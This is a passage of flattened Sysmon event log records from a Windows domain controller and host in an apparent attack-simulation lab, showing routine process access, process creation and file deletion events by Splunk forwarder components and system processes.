Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AFD2F3F255ECFC7EFDDC9DD043B89A9,SHA256=0223E3AB338382B587A8A1BE052564B5A175FBA700B9F072EB230CCC206D28A8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205160Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:17.422{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-17ED-629A-4542-000000005F02}4152C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205159Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:17.422{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205158Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:17.422{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205157Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:17.422{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205156Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:17.422{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205155Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:17.422{2E1864BB-E13C-6299-0500-000000005F02}416780C:\Windows\system32\csrss.exe{2E1864BB-17ED-629A-4542-000000005F02}4152C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000205154Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:17.422{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-17ED-629A-4542-000000005F02}4152C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000205153Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:17.424{2E1864BB-17ED-629A-4542-000000005F02}4152C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000205152Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:17.106{2E1864BB-E1BD-6299-A700-000000005F02}4700NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=629A2C21F647656EA88EE6FEE521C8B9,SHA256=E604B4A7B8CC0D27003035BB57FD1382122ED43BE613C0C163AEDED48EF3CD1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044091Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:17.781{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D364442036CFE769070099C10FE6BC8,SHA256=75E4A70DF97C84FA6A7427028CC834DCFE3C118C0BEB10E0A26E54A29F966847,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205169Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:18.646{2E1864BB-17EE-629A-4642-000000005F02}2036732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205168Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:18.334{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-17EE-629A-4642-000000005F02}2036C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205167Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:18.334{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205166Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:18.334{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205165Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:18.334{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205164Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:18.334{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205163Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:18.334{2E1864BB-E13C-6299-0500-000000005F02}416536C:\Windows\system32\csrss.exe{2E1864BB-17EE-629A-4642-000000005F02}2036C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000205162Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:18.334{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-17EE-629A-4642-000000005F02}2036C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000205161Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:18.335{2E1864BB-17EE-629A-4642-000000005F02}2036C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044092Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:18.875{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C2F9D44A304D224CC657CE456012149,SHA256=6FBBD813D15673BC9016E767E2CAC922169BFA5A5B2F13102EE1F3FAA693F1BD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205190Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:19.628{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-17EF-629A-4842-000000005F02}7380C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205189Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:19.628{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205188Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:19.628{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205187Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:19.628{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205186Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:19.628{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205185Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:19.628{2E1864BB-E13C-6299-0500-000000005F02}416780C:\Windows\system32\csrss.exe{2E1864BB-17EF-629A-4842-000000005F02}7380C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000205184Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:19.628{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-17EF-629A-4842-000000005F02}7380C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000205183Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:19.629{2E1864BB-17EF-629A-4842-000000005F02}7380C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000205182Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:19.378{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=000EFF07F475AC30EC5B85D0B762AD11,SHA256=D7EBAF92F8F5257AEDFFB93F16FD797810B10BF67DCEE49ABAFF05D50D3950DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205181Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:19.161{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 